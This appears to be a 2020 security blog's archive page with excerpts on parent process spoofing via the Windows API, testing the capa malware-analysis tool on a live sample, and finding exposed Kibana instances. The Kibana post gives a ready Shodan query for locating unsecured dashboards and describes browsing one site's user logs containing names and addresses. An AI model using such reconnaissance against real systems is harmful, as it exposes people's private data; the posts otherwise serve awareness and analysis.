Posts

Showing posts from August, 2020

Parent process spoofing and how to detect them

Image
  Malware uses vaious techniques to hide it or evade from antivirus or EDR system.  So I decided to discuss about a very intresting malware hiding technique Parent process spoofing.  This technique is well discussed by many other infosec people and Didier Stevens blogged about this in 2009. I decided to discuss in layman form. parent process spoofing technique allows a malicious program to spawn a process of its choice. It helps the malicious program to hide itself from the parent-child process analyzing which helps defender to find anomalies. How Does It work This is an abuse of windows feature It uses a Windows API CreatProcessA function which use to create a new process. This function has a parameter lpStartupinfo which allows you to choose the parent process.    lpStartupinfo points to STARTUPINFOEX structure    The STARTUPINFOEX structure contains lpAttributeList lpAttributelist is created by InitializeProcThreadAttributeList function this function will allocate the m

Testing capa the Malware analysis tool

Image
    Recently FireEye has released open-source malware analysis tool  capa . It became very popular among malware analysts because of its ability to tell the capability of malware that's what a portable executable file can do on executing on the windows machine.  I decided to test it on some custom malware samples to see how does it works. I chose one malware sample from thezoo , a repository of LIVE malwares. I selected a binary file Trojan.Dropper.GEN On checking virus total this one has a detection rate of 43/63 I did some basic behavior analysis on any.run and here is it's summary of it. On checking process graph it's clear this binary file drop and executes multiple malicious files So I started analysis with ailiao.exe with capa On executing, capa give result about this binary file's capabilities and also shows what ATT&CK Tactic and Technique the threat actor has used We can see capa has reported that it matches 11 malicious activities which include connecting

How hundreds of websites are exposing their sensitive data and risking their user's privacy

Image
    The Purpose of this article is to show how some websites are exposing their sensitive data and risking their user's privacy. Recently some reports came out how some websites are exposing their kibana Instances due to misconfigure ElasticSearch Database so I decided to dig deeper to see how bad it can go . In this post I will show you how easily a blackhat guy could have compromised a site, its databse, it's user's personal information. To do this one can go to shodan.io and enter kibana port:5601 country:"US" org:"Amazon.com" in the search query   Above 5601 is the port number that you access kibana through the US is the country code for the country you want to access and Amazon.com is the services you want to discover like Azure, Google cloud, Digital Ocean, etc.   On searching above query i got 2.6k results    I checked on a random server     Below we can see a user (name hidden) logs. One can also see other details like name, address. I will